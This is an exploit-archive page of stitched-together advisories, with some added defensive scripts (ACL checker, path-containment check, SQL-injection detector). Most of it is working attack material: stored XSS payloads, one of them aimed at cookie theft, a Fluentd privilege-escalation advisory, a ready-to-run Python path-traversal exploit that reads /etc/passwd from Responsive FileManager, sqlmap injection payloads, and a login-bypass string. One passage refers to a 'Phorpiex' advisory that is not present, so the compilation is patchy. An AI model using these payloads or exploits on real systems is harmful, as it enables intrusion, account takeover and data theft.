2. Stored XSS

Use an editor account with rights to manage banners, plugins.

+ Banner Manager:
- Add or edit banner:
Name field: <noframes><p title="</noframes><svg/onload=alert(origin)>">
Note field: <noframes><p title="</noframes><svg/onload=alert(origin)>">

+ Plugin Manager:
- Add or edit album(/admin/plugin/gallery):
Album Name field: <noframes><p title="</noframes><svg/onload=alert(origin)>">
Keyword field: <noframes><p title="</noframes><svg/onload=alert(origin)>">
Short Description field: <noframes><p title="</noframes><svg/onload=alert(origin)>">

- Add or edit Category(/admin/plugin/article/):
Category Name field: <noframes><p title="</noframes><svg/onload=alert(origin)>">



Fluentd TD-agent 4.0.1 Insecure Folder Permission


Fluentd TD-agent plugin version 4.0.1 suffers from an insecure folder permission vulnerability.


MD5 | 69596b2257ba4a29ed887d023e22351f

# Exploit Title: Fluentd TD-agent plugin 4.0.1 - Insecure Folder Permission
# Date: 21.12.2020
# Exploit Author: Adrian Bondocea
# Vendor Homepage: https://www.fluentd.org/
# Software Link: https://td-agent-package-browser.herokuapp.com/4/windows
# Version: <v4.0.1
# Tested on: Windows 10 x64
# CVE : CVE-2020-28169
# External URL: https://github.com/zubrahzz/FluentD-TD-agent-Exploit-CVE-2020-28169

Description:
The td-agent-builder plugin before 2020-12-18 for Fluentd allows attackers to gain privileges because the bin directory is writable by a user account, but a file in bin is executed as NT AUTHORITY\SYSTEM.

Vulnerable Path: ( Authenticated Users have permission to write within the location )
PS C:\opt\td-agent\bin> icacls C:\opt\td-agent\bin
C:\opt\td-agent\bin BUILTIN\Administrators:(I)(OI)(CI)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)

Successfully processed 1 files; Failed processing 0 files

Vulnerable service:
PS C:\opt\td-agent\bin> get-service fluentdwinsvc

Status Name DisplayName
------ ---- -----------
Running fluentdwinsvc Fluentd Windows Service

Service Path:
"C:/opt/td-agent/bin/ruby.exe" -C t"C:/opt/td-agent/lib/ruby/gems/2.7.0/gems/fluentd-1.11.2/lib/fluent/command/.." winsvc.rb --service-name fluentdwinsvc
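Both this advisory and the Phorpiex one above come down to the same check: a directory or file that a privileged process executes is modifiable by a low-privilege principal. The script below is an added example, not part of either advisory: it parses constructed samples in the shape of the cacls output from the Phorpiex advisory and the icacls output from this one, and reports every ACE in which Authenticated Users, Users, Everyone or INTERACTIVE hold a write-capable right (F, C, M or W). The principal list and the rights mapping are assumptions chosen for the example.

```python
import re

# Constructed samples in the shape of the cacls output from the Phorpiex advisory
# and the icacls output from the Fluentd advisory on this page.
SAMPLE_CACLS = """\
C:\\11973197639004\\svchost.exe BUILTIN\\Administrators:(ID)F
                               NT AUTHORITY\\SYSTEM:(ID)F
                               BUILTIN\\Users:(ID)R
                               NT AUTHORITY\\Authenticated Users:(ID)C
"""

SAMPLE_ICACLS = """\
C:\\opt\\td-agent\\bin BUILTIN\\Administrators:(I)(OI)(CI)(F)
                    NT AUTHORITY\\SYSTEM:(I)(OI)(CI)(F)
                    BUILTIN\\Users:(I)(OI)(CI)(RX)
                    NT AUTHORITY\\Authenticated Users:(I)(M)
                    NT AUTHORITY\\Authenticated Users:(I)(OI)(CI)(IO)(M)

Successfully processed 1 files; Failed processing 0 files
"""

# Principals that every local user effectively holds; write access here is a finding.
LOW_PRIV = {"NT AUTHORITY\\AUTHENTICATED USERS", "BUILTIN\\USERS", "EVERYONE",
            "NT AUTHORITY\\INTERACTIVE"}
# Rights tokens that allow modifying the object: cacls F/C/W, icacls F/M/W.
WRITE_TOKENS = {"F", "C", "M", "W"}

# One ACE: "<principal>:<rights>" at the end of a line. The principal is matched
# from a known domain prefix so the object path that precedes it is not absorbed.
ACE_RE = re.compile(
    r"(?P<principal>(?:BUILTIN|NT AUTHORITY|NT SERVICE)\\[^:\\]+|Everyone|[\w.$-]+\\[^:\\]+)"
    r":(?P<rights>(?:\([A-Z,]+\))+[A-Z]*)\s*$"
)


def parse_acl_output(text):
    """Yield (path, principal, rights) for every ACE in cacls/icacls output.

    The object path appears only on the first, unindented line; continuation
    lines are indented and inherit the current path."""
    current_path = None
    for line in text.splitlines():
        m = ACE_RE.search(line)
        if not m:
            continue
        if line and not line[0].isspace():
            current_path = line[:m.start()].strip()
        yield current_path, m.group("principal"), m.group("rights")


def writable_by_low_priv(text):
    """Return [(path, principal, rights)] where a low-privilege principal can modify."""
    findings = []
    for path, principal, rights in parse_acl_output(text):
        tokens = set(re.findall(r"[A-Z]+", rights))
        if principal.upper() in LOW_PRIV and WRITE_TOKENS & tokens:
            findings.append((path, principal, rights))
    return findings


if __name__ == "__main__":
    for sample in (SAMPLE_CACLS, SAMPLE_ICACLS):
        for path, principal, rights in writable_by_low_priv(sample):
            print("WRITABLE %s by %s %s" % (path, principal, rights))
```

Feed it the output of `icacls` over the directories that hold service binaries and scheduled-task targets; any hit is a candidate for the privilege-escalation path these two advisories describe, and the fix is to remove the write right for that principal (in the Fluentd case, the package should install bin with the Users/Authenticated Users read-execute ACL only).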


Responsive FileManager 9.13.4 Path Traversal


Responsive FileManager version 9.13.4 path traversal exploit. Original discovery of this finding is attributed to farisv in December of 2018.


MD5 | 576b9b1598c826767542e7d40705bbc2

# Exploit Title: Responsive FileManager 9.13.4 - 'path' Path Traversal
# Date: 12/12/2018 (PoC)
# Date: 04/01/2020 (Auto Exploit)
# Exploit Author: SunCSR (Sun* Cyber Security Research)
# Google Dork: intitle:"Responsive FileManager 9.x.x"
# Vendor Homepage: http://responsivefilemanager.com/
# Software Link: https://github.com/trippo/ResponsiveFilemanager/releases/tag/v9.13.4
# Version: < 9.13.4
# Tested on: Linux 64bit + Python3

#!/usr/bin/python3

# Usage: python3 exploit.py [URL] [SESSION] [File Path]
# python3 exploit.py http://local.lc:8081 PHPSESSID=hfpg2g4rdpvmpgth33jn643hq4 /etc/passwd

import requests
import sys

def usage():
    if len(sys.argv) != 4:
        print("Usage: python3 exploit.py [URL] [SESSION] [File Path]")
        sys.exit(0)

def copy_cut(url, session_cookie, file_name):
    # Put the traversal path on the server-side clipboard via copy_cut.
    headers = {'Cookie': session_cookie,
               'Content-Type': 'application/x-www-form-urlencoded'}
    url_copy = "%s/filemanager/ajax_calls.php?action=copy_cut" % (url)
    r = requests.post(
        url_copy, data="sub_action=copy&path=../../../../../../.." + file_name, headers=headers)
    return r.status_code

def paste_clipboard(url, session_cookie):
    # Paste the clipboard into the managed directory (the web-accessible source dir).
    headers = {'Cookie': session_cookie, 'Content-Type': 'application/x-www-form-urlencoded'}
    url_paste = "%s/filemanager/execute.php?action=paste_clipboard" % (url)
    r = requests.post(
        url_paste, data="path=", headers=headers)
    return r.status_code

def read_file(url, file_name):
    name_file = file_name.split('/')[-1]
    url_path = "%s/source/%s" % (url, name_file)  # This is the default directory;
                                                  # if the website is a little different, edit this place
    result = requests.get(url_path)
    return result.text

def main():
    usage()
    url = sys.argv[1]
    session_cookie = sys.argv[2]
    file_name = sys.argv[3]
    print("[*] Copy Clipboard")
    copy_result = copy_cut(url, session_cookie, file_name)
    if copy_result != 200:
        print("[-] Copy False")
        return
    print("[*] Paste Clipboard")
    paste_result = paste_clipboard(url, session_cookie)
    if paste_result != 200:
        print("[-] Paste False")
        return
    print(read_file(url, file_name))

if __name__ == "__main__":
    main()
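The copy_cut request above hands the 'path' parameter straight to a filesystem operation. As an added example (not part of the PoC or of Responsive FileManager), this is the containment check a file manager should apply to such a parameter before using it: a lexical rejection of traversal on the raw request value, followed by a realpath check that also catches symlinks inside the managed directory. The demo() tree and its cases are constructed for this example.

```python
import os
import posixpath
import tempfile

class PathTraversalError(ValueError):
    """Raised when a user-supplied path would escape the managed directory."""

def confine_to_root(root, user_path):
    """Resolve user_path under root; raise if it escapes. Returns the absolute path.
    Lexical check first (rejects ../ before touching the filesystem), then a
    realpath check (catches symlinks inside root that point outside it)."""
    if "\0" in user_path:
        raise PathTraversalError("NUL byte in path parameter")
    # Do NOT prefix "/" before normalising: normpath("/../x") silently drops the
    # traversal, which is exactly what must be detected here.
    rel = posixpath.normpath(user_path.replace("\\", "/"))
    if posixpath.isabs(rel) or rel == ".." or rel.startswith("../"):
        raise PathTraversalError(f"path parameter escapes root: {user_path!r}")
    root_real = os.path.realpath(root)
    full = os.path.realpath(os.path.join(root_real, rel))
    if os.path.commonpath([root_real, full]) != root_real:
        raise PathTraversalError(f"resolved path escapes root: {full!r}")
    return full

def is_confined(root, user_path):
    """True if confine_to_root accepts the value, False if it rejects it."""
    try:
        confine_to_root(root, user_path)
        return True
    except PathTraversalError:
        return False

def demo():
    """Exercise the check in a throwaway tree (constructed for this demo).
    Returns {case: accepted} for the PoC payload and a symlink escape."""
    with tempfile.TemporaryDirectory() as tmp:
        root = os.path.join(tmp, "source")
        os.makedirs(os.path.join(root, "docs"))
        os.symlink(tmp, os.path.join(root, "escape"))  # inside root, points outside
        poc = "../../../../../../../etc/passwd"        # the value the PoC above sends
        return {
            "benign": is_confined(root, "docs/report.pdf"),
            "poc_traversal": is_confined(root, poc),
            "absolute": is_confined(root, "/etc/passwd"),
            "symlink_escape": is_confined(root, "escape/secret.txt"),
            "dotdot_inside": is_confined(root, "docs/../docs/a.txt"),
        }
```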



Baby Care System 1.0 Cross Site Scripting


Baby Care System version 1.0 suffers from a persistent cross site scripting vulnerability.


MD5 | e122e2e2d5eeb98815a2167dd561c26c

# Exploit Title: Baby Care System 1.0 - 'Post title' Stored XSS
# Exploit Author: Hardik Solanki
# Vendor Homepage: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14622&title=Baby+Care+System+in+PHP%2FMySQLi+with+Full+Source+Code+
# Version: 1
# Tested on Windows

Vulnerable Parameters: Edit Page tab

Steps to reproduce:
1: Log in with a valid username and password. Navigate to the "Post" tab on the left-hand side.
2: Add a new post, enter the payload "<audio src/onerror=alert(document.cookie)>" in the "Post title" parameter, and click the save button. The post is saved successfully.
3: The XSS payload is now stored and triggers every time the post is rendered, so an attacker can steal authenticated users' cookies.


Responsive ELearning System 1.0 SQL Injection


Responsive ELearning System version 1.0 suffers from a remote SQL injection vulnerability.


MD5 | d3bb7701d52625b71cc012a0457df1b5

# Exploit Title: Responsive E-Learning System 1.0 – 'id' Sql Injection
# Date: 2020-12-24
# Exploit Author: Kshitiz Raj(manitorpotterk)
# Vendor Homepage: https://www.sourcecodester.com/php/5172/responsive-e-learning-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=5172&title=Responsive+E-Learning+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested on: Windows 10/Kali Linux

The 'id=' parameter in Responsive E-Learning System is vulnerable to SQL injection.

Vulnerable URL: http://localhost/elearning/delete_teacher_students.php?id=17 (parameter: id)

# sqlmap -u http://192.168.127.1//elearning/delete_teacher_students.php?id=17 -p id

[sqlmap banner: {1.3.11#stable} http://sqlmap.org]

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 08:59:01 /2020-12-24/

[08:59:33] [INFO] checking if the injection point on GET parameter 'id' is a false positive
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 402 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=17' RLIKE (SELECT (CASE WHEN (7532=7532) THEN 17 ELSE 0x28 END))-- YDSn

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=17' AND (SELECT 4939 FROM (SELECT(SLEEP(5)))EQuU)-- RaGm
---
[08:59:38] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.34, Apache 2.4.46
back-end DBMS: MySQL >= 5.0.12


Resumes Management And Job Application Website 1.0 SQL Injection


Resumes Management and Job Application Website version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.


MD5 | c905e33f562b217b311080f61594e5f8

# Exploit Title: Resumes Management and Job Application Website 1.0 - Authentication Bypass (Sql Injection)
# Date: 2020-12-27
# Exploit Author: Kshitiz Raj (manitorpotterk)
# Vendor Homepage: http://egavilanmedia.com
# Software Link: https://egavilanmedia.com/resumes-management-and-job-application-website/
# Version: 1.0
# Tested on: Windows 10/Kali Linux

Step 1 - Go to URL http://localhost/Resumes/login.html
Step 2 - Enter Username: ' or '1'='1'#
Step 3 - Enter Password: anything
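The E-Learning sqlmap run and the Resumes login bypass above show three injection families: a quoted tautology, an RLIKE boolean-blind probe and a SLEEP-based time-blind probe. As an added detection example (not part of either advisory, and no substitute for parameterised queries in the PHP code), the following Python inspects request parameters for those families; the sample requests are constructed from the payloads shown above, with hostnames and the login.php handler as assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Coarse signatures for the injection families in the two advisories above.
# A match is a detection signal worth alerting on, not proof of exploitation.
SIGNATURES = {
    "tautology":   re.compile(r"'\s*or\s*'[^']*'\s*=\s*'", re.I),   # ' or '1'='1'#
    "rlike_blind": re.compile(r"\brlike\s*\(\s*select\b", re.I),      # ' RLIKE (SELECT (CASE ...
    "time_blind":  re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I),   # (SELECT(SLEEP(5)))
}

def normalize(value):
    """Undo URL encoding twice (catches double-encoded payloads) and collapse whitespace."""
    return re.sub(r"\s+", " ", unquote_plus(unquote_plus(value)))

def classify(value):
    """Names of the signatures that match one parameter value."""
    v = normalize(value)
    return [name for name, rx in SIGNATURES.items() if rx.search(v)]

def inspect_request(url, form=None):
    """{param: [signatures]} for every query-string or form parameter that matches."""
    params = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    params += list((form or {}).items())
    hits = {}
    for name, value in params:
        tags = classify(value)
        if tags:
            hits[name] = tags
    return hits

# Constructed requests: the two sqlmap payloads from the E-Learning run, URL-encoded as
# they would appear in an access log, a benign request, and the Resumes login as a POST form.
SAMPLE_REQUESTS = [
    ("http://elearning.example/delete_teacher_students.php?id=17%27%20RLIKE%20%28SELECT%20%28CASE%20WHEN%20%287532%3D7532%29%20THEN%2017%20ELSE%200x28%20END%29%29--%20YDSn", None),
    ("http://elearning.example/delete_teacher_students.php?id=17%27%20AND%20%28SELECT%204939%20FROM%20%28SELECT%28SLEEP%285%29%29%29EQuU%29--%20RaGm", None),
    ("http://elearning.example/delete_teacher_students.php?id=17", None),
    ("http://resumes.example/login.php", {"username": "' or '1'='1'#", "password": "anything"}),
]

def scan_samples():
    """Run inspect_request over SAMPLE_REQUESTS; returns one hit dict per request."""
    return [inspect_request(url, form) for url, form in SAMPLE_REQUESTS]

if __name__ == "__main__":
    for (url, _), hits in zip(SAMPLE_REQUESTS, scan_samples()):
        print(f"{'ALERT' if hits else 'ok   '} {url.split('?')[0]} {hits}")
```

Values such as O'Brien or a lone apostrophe do not match, because each signature requires the operator or function that follows the breakout quote, not the quote alone.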

